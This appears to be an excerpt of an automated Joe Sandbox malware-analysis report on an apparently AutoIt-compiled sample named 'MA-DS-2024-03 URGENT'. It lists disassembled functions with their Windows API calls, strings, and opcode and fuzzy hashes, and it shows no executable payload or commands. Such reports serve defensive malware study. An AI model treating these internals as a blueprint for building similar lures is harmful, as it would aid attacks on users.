                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                        • String ID:
                                                        • API String ID: 1996641542-0
                                                        • Opcode ID: f494a7411c48f5e7fd0fcdc65f06905e9b344178169c197affe29c411b6fe10c
                                                        • Instruction ID: 67910f5981194f54d32d2413a419bc6a22b5e02dd88e552ef27f67441b011758
                                                        • Opcode Fuzzy Hash: f494a7411c48f5e7fd0fcdc65f06905e9b344178169c197affe29c411b6fe10c
                                                        • Instruction Fuzzy Hash: AD514F71901208FFDB10AFA4DC48EAE7B79EF08320F114A2AF911AB2A1D7759D54DF54
                                                        Function 004889D5 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00488AC1
                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00488AD2
                                                        • CharNextW.USER32(0000014E), ref: 00488B01
                                                        • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00488B42
                                                        • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00488B58
                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00488B69
                                                        • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00488B86
                                                        • SetWindowTextW.USER32(?,0000014E), ref: 00488BD8
                                                        • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00488BEE
                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00488C1F
                                                        • _memset.LIBCMT ref: 00488C44
                                                        • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00488C8D
                                                        • _memset.LIBCMT ref: 00488CEC
                                                        • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00488D16
                                                        • SendMessageW.USER32(?,00001074,?,00000001), ref: 00488D6E
                                                        • SendMessageW.USER32(?,0000133D,?,?), ref: 00488E1B
                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00488E3D
                                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00488E87
                                                        • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00488EB4
                                                        • DrawMenuBar.USER32(?), ref: 00488EC3
                                                        • SetWindowTextW.USER32(?,0000014E), ref: 00488EEB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                        • String ID: 0
                                                        • API String ID: 1073566785-4108050209
                                                        • Opcode ID: acd43d964c9f79b746e59a855526a859d217a01e4a39f380eab83080f2ec0215
                                                        • Instruction ID: 787a5fb712104ee4b76f4ba17aa60975d6cacfa81cf9944a1fa1b3bb2a4fb8ea
                                                        • Opcode Fuzzy Hash: acd43d964c9f79b746e59a855526a859d217a01e4a39f380eab83080f2ec0215
                                                        • Instruction Fuzzy Hash: 44E1B370900218AFDB20AF51CC84EEF7BB9EF04710F50456FFA15AA290DB789985DF69
                                                        Function 0048488F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetCursorPos.USER32(?), ref: 004849CA
                                                        • GetDesktopWindow.USER32 ref: 004849DF
                                                        • GetWindowRect.USER32(00000000), ref: 004849E6
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00484A48
                                                        • DestroyWindow.USER32(?), ref: 00484A74
                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00484A9D
                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00484ABB
                                                        • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00484AE1
                                                        • SendMessageW.USER32(?,00000421,?,?), ref: 00484AF6
                                                        • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00484B09
                                                        • IsWindowVisible.USER32(?), ref: 00484B29
                                                        • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00484B44
                                                        • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00484B58
                                                        • GetWindowRect.USER32(?,?), ref: 00484B70
                                                        • MonitorFromPoint.USER32(?,?,00000002), ref: 00484B96
                                                        • GetMonitorInfoW.USER32(00000000,?), ref: 00484BB0
                                                        • CopyRect.USER32(?,?), ref: 00484BC7
                                                        • SendMessageW.USER32(?,00000412,00000000), ref: 00484C32
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                        • String ID: ($0$tooltips_class32
                                                        • API String ID: 698492251-4156429822
                                                        • Opcode ID: 943f141a24a5701e169943524c067f38581a5f413d5e7729d13daee1db30ced1
                                                        • Instruction ID: 71fd3677379c23cac636b4aadb2286f0fe2b453109396d863f09e4e9c2446b6d
                                                        • Opcode Fuzzy Hash: 943f141a24a5701e169943524c067f38581a5f413d5e7729d13daee1db30ced1
                                                        • Instruction Fuzzy Hash: EFB15971604341AFDB04EF65C844A6FBBE4BF88314F008A2EF999AB291D775EC05CB59
                                                        Function 0046449A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetFileVersionInfoSizeW.VERSION(?,?), ref: 004644AC
                                                        • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 004644D2
                                                        • _wcscpy.LIBCMT ref: 00464500
                                                        • _wcscmp.LIBCMT ref: 0046450B
                                                        • _wcscat.LIBCMT ref: 00464521
                                                        • _wcsstr.LIBCMT ref: 0046452C
                                                        • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00464548
                                                        • _wcscat.LIBCMT ref: 00464591
                                                        • _wcscat.LIBCMT ref: 00464598
                                                        • _wcsncpy.LIBCMT ref: 004645C3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                        • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                        • API String ID: 699586101-1459072770
                                                        • Opcode ID: 84693badfcaee18dc147f2574c13799befe7203a24675f70ea48bb6cde0c79b9
                                                        • Instruction ID: 2b480a1fb6a64e9c247c6b56b60e40bdc72f3d5a191167641815a527c939035c
                                                        • Opcode Fuzzy Hash: 84693badfcaee18dc147f2574c13799befe7203a24675f70ea48bb6cde0c79b9
                                                        • Instruction Fuzzy Hash: 7641D431A002107BDB14BA75AC43FBF77ACDF81714F50046FF905A6182FA7C9A4296AE
                                                        Function 004027D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004028BC
                                                        • GetSystemMetrics.USER32(00000007), ref: 004028C4
                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004028EF
                                                        • GetSystemMetrics.USER32(00000008), ref: 004028F7
                                                        • GetSystemMetrics.USER32(00000004), ref: 0040291C
                                                        • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00402939
                                                        • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00402949
                                                        • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0040297C
                                                        • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00402990
                                                        • GetClientRect.USER32(00000000,000000FF), ref: 004029AE
                                                        • GetStockObject.GDI32(00000011), ref: 004029CA
                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 004029D5
                                                          • Part of subcall function 00402344: GetCursorPos.USER32(?), ref: 00402357
                                                          • Part of subcall function 00402344: ScreenToClient.USER32(004C57B0,?), ref: 00402374
                                                          • Part of subcall function 00402344: GetAsyncKeyState.USER32(00000001), ref: 00402399
                                                          • Part of subcall function 00402344: GetAsyncKeyState.USER32(00000002), ref: 004023A7
                                                        • SetTimer.USER32(00000000,00000000,00000028,00401256), ref: 004029FC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                        • String ID: AutoIt v3 GUI
                                                        • API String ID: 1458621304-248962490
                                                        • Opcode ID: 4ff91775ebca8baf8613358a2091c309939bc505a39819b9e80b7d3697c8673c
                                                        • Instruction ID: a18fd751d40b92a0f9ce74f9a4650c687106778ef47aaf7a4e9f1722fdb5861d
                                                        • Opcode Fuzzy Hash: 4ff91775ebca8baf8613358a2091c309939bc505a39819b9e80b7d3697c8673c
                                                        • Instruction Fuzzy Hash: 8AB15075600209EFDB14EFA8DD49BAE77B4FB08314F10463AFA15A62D0DB78A851CB58
                                                        Function 0045A439 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetClassNameW.USER32(?,?,00000100), ref: 0045A47A
                                                        • __swprintf.LIBCMT ref: 0045A51B
                                                        • _wcscmp.LIBCMT ref: 0045A52E
                                                        • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0045A583
                                                        • _wcscmp.LIBCMT ref: 0045A5BF
                                                        • GetClassNameW.USER32(?,?,00000400), ref: 0045A5F6
                                                        • GetDlgCtrlID.USER32(?), ref: 0045A648
                                                        • GetWindowRect.USER32(?,?), ref: 0045A67E
                                                        • GetParent.USER32(?), ref: 0045A69C
                                                        • ScreenToClient.USER32(00000000), ref: 0045A6A3
                                                        • GetClassNameW.USER32(?,?,00000100), ref: 0045A71D
                                                        • _wcscmp.LIBCMT ref: 0045A731
                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 0045A757
                                                        • _wcscmp.LIBCMT ref: 0045A76B
                                                          • Part of subcall function 0042362C: _iswctype.LIBCMT ref: 00423634
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                        • String ID: %s%u
                                                        • API String ID: 3744389584-679674701
                                                        • Opcode ID: 22f345dc1749fc61d738452cff1ec01fec5d702c3361f6a434a16c0623e3483b
                                                        • Instruction ID: eb4c2c17bfd361fdb29ac4d9e78bc58de04dd0089fb3858937583b9ed20721cb
                                                        • Opcode Fuzzy Hash: 22f345dc1749fc61d738452cff1ec01fec5d702c3361f6a434a16c0623e3483b
                                                        • Instruction Fuzzy Hash: 06A1B431204606BFD714DF60C884BABB7E8FF44316F04462AFD99D2251D738E969CB9A
                                                        Function 0045AED4 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetClassNameW.USER32(00000008,?,00000400), ref: 0045AF18
                                                        • _wcscmp.LIBCMT ref: 0045AF29
                                                        • GetWindowTextW.USER32(00000001,?,00000400), ref: 0045AF51
                                                        • CharUpperBuffW.USER32(?,00000000), ref: 0045AF6E
                                                        • _wcscmp.LIBCMT ref: 0045AF8C
                                                        • _wcsstr.LIBCMT ref: 0045AF9D
                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 0045AFD5
                                                        • _wcscmp.LIBCMT ref: 0045AFE5
                                                        • GetWindowTextW.USER32(00000002,?,00000400), ref: 0045B00C
                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 0045B055
                                                        • _wcscmp.LIBCMT ref: 0045B065
                                                        • GetClassNameW.USER32(00000010,?,00000400), ref: 0045B08D
                                                        • GetWindowRect.USER32(00000004,?), ref: 0045B0F6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                        • String ID: @$ThumbnailClass
                                                        • API String ID: 1788623398-1539354611
                                                        • Opcode ID: 669bc5d2a5c452374ee22981f9444d8d68a805a8765a871b1b4bd50104187170
                                                        • Instruction ID: 2113ca19c953e4d0fb0a3bed3b629d6a09082ecb25fab152276a3acc7fd757eb
                                                        • Opcode Fuzzy Hash: 669bc5d2a5c452374ee22981f9444d8d68a805a8765a871b1b4bd50104187170
                                                        • Instruction Fuzzy Hash: BD81CF711082059BDB00DF11C881BAB77E8EF4075AF14856FFD859A192DB38DD4DCBAA
                                                        Function 0048C5FE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 181windowfileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                        • DragQueryPoint.SHELL32(?,?), ref: 0048C627
                                                          • Part of subcall function 0048AB37: ClientToScreen.USER32(?,?), ref: 0048AB60
                                                          • Part of subcall function 0048AB37: GetWindowRect.USER32(?,?), ref: 0048ABD6
                                                          • Part of subcall function 0048AB37: PtInRect.USER32(?,?,0048C014), ref: 0048ABE6
                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 0048C690
                                                        • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0048C69B
                                                        • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0048C6BE
                                                        • _wcscat.LIBCMT ref: 0048C6EE
                                                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0048C705
                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 0048C71E
                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 0048C735
                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 0048C757
                                                        • DragFinish.SHELL32(?), ref: 0048C75E
                                                        • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0048C851
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                        • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pbL
                                                        • API String ID: 169749273-3863044002
                                                        • Opcode ID: fe787714386ed1c3ddd4163c3f5535821c598f5dfa6e15062804bbb5d4f1b538
                                                        • Instruction ID: 4fadb8ae9d86136d60326728fb0320be203031e120dd753c2ba31efb77555f42
                                                        • Opcode Fuzzy Hash: fe787714386ed1c3ddd4163c3f5535821c598f5dfa6e15062804bbb5d4f1b538
                                                        • Instruction Fuzzy Hash: 1B617F71108300AFC701EF65CC85D9FBBE8EF88714F50092EF591A22A1DB74A949CB6A
                                                        Function 0045ABD4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: __wcsnicmp
                                                        • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                        • API String ID: 1038674560-1810252412
                                                        • Opcode ID: a4b87119f2590ef0ff3b3c98b7eb3c6a6e3570d121fdce2df4e859d34895fad6
                                                        • Instruction ID: cc55e2bc6580523fe6938d14c256d65c14dee3a36fa7a852f9c3cef8ae364549
                                                        • Opcode Fuzzy Hash: a4b87119f2590ef0ff3b3c98b7eb3c6a6e3570d121fdce2df4e859d34895fad6
                                                        • Instruction Fuzzy Hash: 2C31A370A48209AADB01EA61DE43FEE7774AF14719F60052FB801711D2EB6D6F18C56E
                                                        Function 00474FFD Relevance: 25.6, APIs: 17, Instructions: 110COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadCursorW.USER32(00000000,00007F8A), ref: 00475013
                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 0047501E
                                                        • LoadCursorW.USER32(00000000,00007F03), ref: 00475029
                                                        • LoadCursorW.USER32(00000000,00007F8B), ref: 00475034
                                                        • LoadCursorW.USER32(00000000,00007F01), ref: 0047503F
                                                        • LoadCursorW.USER32(00000000,00007F81), ref: 0047504A
                                                        • LoadCursorW.USER32(00000000,00007F88), ref: 00475055
                                                        • LoadCursorW.USER32(00000000,00007F80), ref: 00475060
                                                        • LoadCursorW.USER32(00000000,00007F86), ref: 0047506B
                                                        • LoadCursorW.USER32(00000000,00007F83), ref: 00475076
                                                        • LoadCursorW.USER32(00000000,00007F85), ref: 00475081
                                                        • LoadCursorW.USER32(00000000,00007F82), ref: 0047508C
                                                        • LoadCursorW.USER32(00000000,00007F84), ref: 00475097
                                                        • LoadCursorW.USER32(00000000,00007F04), ref: 004750A2
                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 004750AD
                                                        • LoadCursorW.USER32(00000000,00007F89), ref: 004750B8
                                                        • GetCursorInfo.USER32(?), ref: 004750C8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Cursor$Load$Info
                                                        • String ID:
                                                        • API String ID: 2577412497-0
                                                        • Opcode ID: fe88967af424c1f4c9ae994d1dca842c12f2ee5cef9159fe2d10a3b622c76547
                                                        • Instruction ID: d5c7a2001707235dd9e126089dd3671015cbda4ea0a9ffae781a460d29ca5a6d
                                                        • Opcode Fuzzy Hash: fe88967af424c1f4c9ae994d1dca842c12f2ee5cef9159fe2d10a3b622c76547
                                                        • Instruction Fuzzy Hash: 7F3114B1D083196ADF109FB68C8999FBFE8FF04750F50453BA50DEB281DA7865048F95
                                                        Function 0048A1B9 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _memset.LIBCMT ref: 0048A259
                                                        • DestroyWindow.USER32(?,?), ref: 0048A2D3
                                                          • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0048A34D
                                                        • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0048A36F
                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0048A382
                                                        • DestroyWindow.USER32(00000000), ref: 0048A3A4
                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0048A3DB
                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0048A3F4
                                                        • GetDesktopWindow.USER32 ref: 0048A40D
                                                        • GetWindowRect.USER32(00000000), ref: 0048A414
                                                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0048A42C
                                                        • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0048A444
                                                          • Part of subcall function 004025DB: GetWindowLongW.USER32(?,000000EB), ref: 004025EC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
